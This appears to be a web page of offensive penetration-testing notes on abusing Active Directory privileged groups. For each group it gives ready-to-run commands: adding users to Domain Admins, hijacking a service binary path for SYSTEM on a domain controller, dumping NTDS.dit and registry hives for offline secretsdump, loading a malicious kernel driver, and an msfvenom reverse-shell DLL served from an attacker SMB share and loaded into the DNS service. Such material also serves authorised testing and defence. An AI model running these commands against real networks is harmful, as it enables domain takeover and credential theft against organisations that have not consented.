Skip to main content
Privileged groups are one of the most reliable paths to domain compromise. Members inherit rights that were designed for legitimate administration but translate directly into attacker capabilities.

Finding Group Memberships

Check group membership before anything else: knowing what groups a compromised account is in tells you what you can do next without touching a single exploit. 
# Check what groups a user belongs to
net user $TARGET /domain
Get-ADUser -Identity $TARGET -Properties MemberOf | Select -ExpandProperty MemberOf

# List all members of a specific group
net group "Server Operators" /domain
Get-ADGroupMember -Identity "Server Operators" -Recursive

# nxc
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M groupmembership -o USER=$TARGET
nxc smb $IP -u $USER -p $PASSWORD --groups

Domain Admins

The highest privilege group in the domain. Members have full control over all domain resources, can log into any machine, perform DCSync, and modify any object. Offensive value: full domain compromise. If you land here, dump NTDS, forge Golden Tickets, and do whatever you want. 
# Check if you're DA
whoami /groups | findstr "Domain Admins"

# Add yourself (if you have the right ACL)
net group "Domain Admins" $USER /add /domain
Add-DomainGroupMember -Identity "Domain Admins" -Members $USER

Enterprise Admins

Only exists in the forest root domain. Members have admin rights across all domains in the forest, making this more powerful than Domain Admins in multi-domain environments. Offensive value: forest-wide compromise. Required for the ExtraSids attack (child to parent domain escalation).

Schema Admins

Can modify the AD schema, which is the blueprint defining all AD object types and attributes. Rarely populated in practice. Offensive value: low day-to-day value, but schema modifications are persistent and hard to detect. Can add new attributes or backdoor the schema.

Account Operators

Can create, modify, and delete most user and group accounts in the domain. Cannot modify Domain Admins or other privileged groups, but can log into domain controllers interactively. Offensive value: create a new user and add them to groups you control. Can also reset passwords of non-privileged users. 
# Create a user
net user hacker Pass123! /add /domain

# Add to a group (within their scope)
net group "IT Support" hacker /add /domain

Server Operators

Can log into domain controllers interactively, start and stop services, perform backups and restores on DCs, and manage disk configuration. Offensive value: direct DC access without being DA. Can start and stop services on the DC; abuse a writable service binPath to get SYSTEM on the DC. 
# Check services you can modify
.\SharpUp.exe audit

# Modify a service binary path to execute your payload
sc.exe config $SERVICE binpath= "cmd /c net localgroup administrators $USER /add"
sc.exe stop $SERVICE
sc.exe start $SERVICE

# Or use nxc to check
nxc smb $DC_IP -u $USER -p $PASSWORD -M backup_operator

Backup Operators

Members can bypass NTFS permissions to read and write any file on the system, including files locked by the OS. Can log into DCs locally and perform backup and restore operations. Offensive value: can copy SAM, SYSTEM, and NTDS.dit directly from a DC without being DA. One of the most reliable privesc paths when you land an account in this group. 
# Check if you're a Backup Operator
whoami /groups | findstr "Backup"

# Use diskshadow + robocopy to extract NTDS.dit (requires Backup Operators rights on DC)
diskshadow.exe /s script.dsh      # create VSS shadow copy via script
robocopy /b \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ C:\loot\ ntds.dit

# Grab registry hives (need SYSTEM to decrypt)
reg save HKLM\SYSTEM C:\loot\SYSTEM
reg save HKLM\SAM C:\loot\SAM

# Then secretsdump offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# nxc can check and exploit this directly
nxc smb $DC_IP -u $USER -p $PASSWORD -M backup_operator
nxc smb $DC_IP -u $USER -p $PASSWORD --ntds
Can manage printers and printer drivers on DCs, and log into DCs interactively. Loading printer drivers requires SeLoadDriverPrivilege. Offensive value: SeLoadDriverPrivilege can be abused to load a malicious kernel driver and escalate to SYSTEM. Classic Capcom.sys / EopLoadDriver exploit path. 
# Check for SeLoadDriverPrivilege
whoami /priv | findstr SeLoadDriverPrivilege

# Abuse with EopLoadDriver (loads a vulnerable driver to escalate)
EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\path\to\driver.sys

Remote Desktop Users

Members can connect to machines via RDP. No elevated privileges on the machine itself, just the ability to initiate an RDP session. Offensive value: lateral movement when WinRM and SMB are blocked but RDP (3389) is open. 
# Check RDP access
nxc rdp $IP -u $USER -p $PASSWORD

# Connect
xfreerdp /u:$USER /p:$PASSWORD /v:$IP

Remote Management Users

Members can connect via WinRM (PowerShell Remoting), port 5985/5986. Added in Windows 2012. Offensive value: evil-winrm access without being a local admin. Common foothold for lateral movement once you have credentials. 
nxc winrm $IP -u $USER -p $PASSWORD
evil-winrm -i $IP -u $USER -p $PASSWORD

DnsAdmins

Members can manage the DNS service on domain controllers and load a DLL into the DNS service process, which runs as SYSTEM. Offensive value: one of the most underrated privesc paths. Load a malicious DLL into dns.exe to get a SYSTEM shell on the DC without ever touching DA. 
# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll

# Host the DLL on an SMB share
impacket-smbserver share . -smb2support

# Set the DLL as the DNS plugin (requires DnsAdmins membership)
dnscmd.exe /config /serverlevelplugindll \\$LHOST\share\evil.dll

# Restart DNS service to trigger DLL load
sc.exe stop dns
sc.exe start dns

Protected Users

A security group that enforces strict Kerberos protections on members: no NTLM auth, no Kerberos delegation, no cached credentials, tickets expire after 4 hours. From an attacker’s perspective this is a blocker. If your target is in Protected Users, PtH fails, delegation attacks fail, and credentials won’t be in LSASS memory after logoff. Check before wasting time on those paths. 
# Check if a user is Protected
Get-ADGroupMember -Identity "Protected Users" | Select Name

# Check if your target is protected before attempting PtH or delegation
Get-ADUser -Identity $TARGET -Properties MemberOf | Select -ExpandProperty MemberOf

Group Policy Creator Owners

Members can create Group Policy Objects in the domain. Creating a GPO alone is not dangerous, but if the GPO can be linked to an OU containing machines or users, it becomes a reliable privesc path. Offensive value: create a malicious GPO (add local admin, deploy a startup script, drop a reverse shell) and link it to a target OU. Requires separate link permissions on the OU. 
# Enumerate GPO link permissions with PowerView
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {
    $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "Write"
}

# Create and link a malicious GPO with SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount $USER --GPOName "Default Domain Policy"

NOACCESS (Custom Deny Groups)

NOACCESS is not a built-in Windows group: it is a custom security group that organisations create to explicitly deny access to resources. Explicit DENY ACEs always override ALLOW ACEs in Windows, so membership in this group blocks the account from whatever the group is scoped against, regardless of other permissions the account holds. You will encounter these in BloodHound as a MemberOf edge from a service account or user to a group named something like NOACCESS, NO_RDP, DENY_SMB, or similar. The name usually hints at what is being blocked. Offensive value: if the account you compromised is in a NOACCESS group, it explains why your access is being denied despite valid credentials. If you have write rights on the group object, you can remove the account from it to restore access. 
# Check what groups your account is in (look for restrictive names)
net user $USER /domain
Get-ADUser -Identity $USER -Properties MemberOf | Select -ExpandProperty MemberOf

# Check the group's scope and what it denies (look at ACLs on shares, OUs, GPOs)
Get-ADGroup -Identity "NOACCESS" -Properties *
Get-ADGroupMember -Identity "NOACCESS" | Select Name

# If you have WriteProperty or GenericWrite on the group, remove yourself
Remove-ADGroupMember -Identity "NOACCESS" -Members $USER -Confirm:$false

# bloodyAD from Linux (if you have write rights on the group)
bloodyAD -u $USER -p $PASSWORD -d $DOMAIN --host $DC_HOST \
  remove groupMember "NOACCESS" $USER

Quick Reference

GroupCan log into DC?Key Offensive ValueDifficulty
Domain AdminsYesFull domain control, DCSync, Golden TicketYou win
Enterprise AdminsYesForest-wide controlYou win
Backup OperatorsYes (local)Dump NTDS.dit without DAMedium
Server OperatorsYes (local)Service abuse on DC → SYSTEMMedium
Account OperatorsNoCreate users, reset passwordsLow
Print OperatorsYes (local)SeLoadDriverPrivilege → kernel exploitHard
DnsAdminsNoLoad DLL into DNS service → SYSTEM on DCMedium
Remote Management UsersNoWinRM lateral movementLow
Remote Desktop UsersNoRDP lateral movementLow
Group Policy Creator OwnersNoMalicious GPO if OU link rights existMedium
Protected UsersNoBlocks PtH, delegation, cached credsDefensive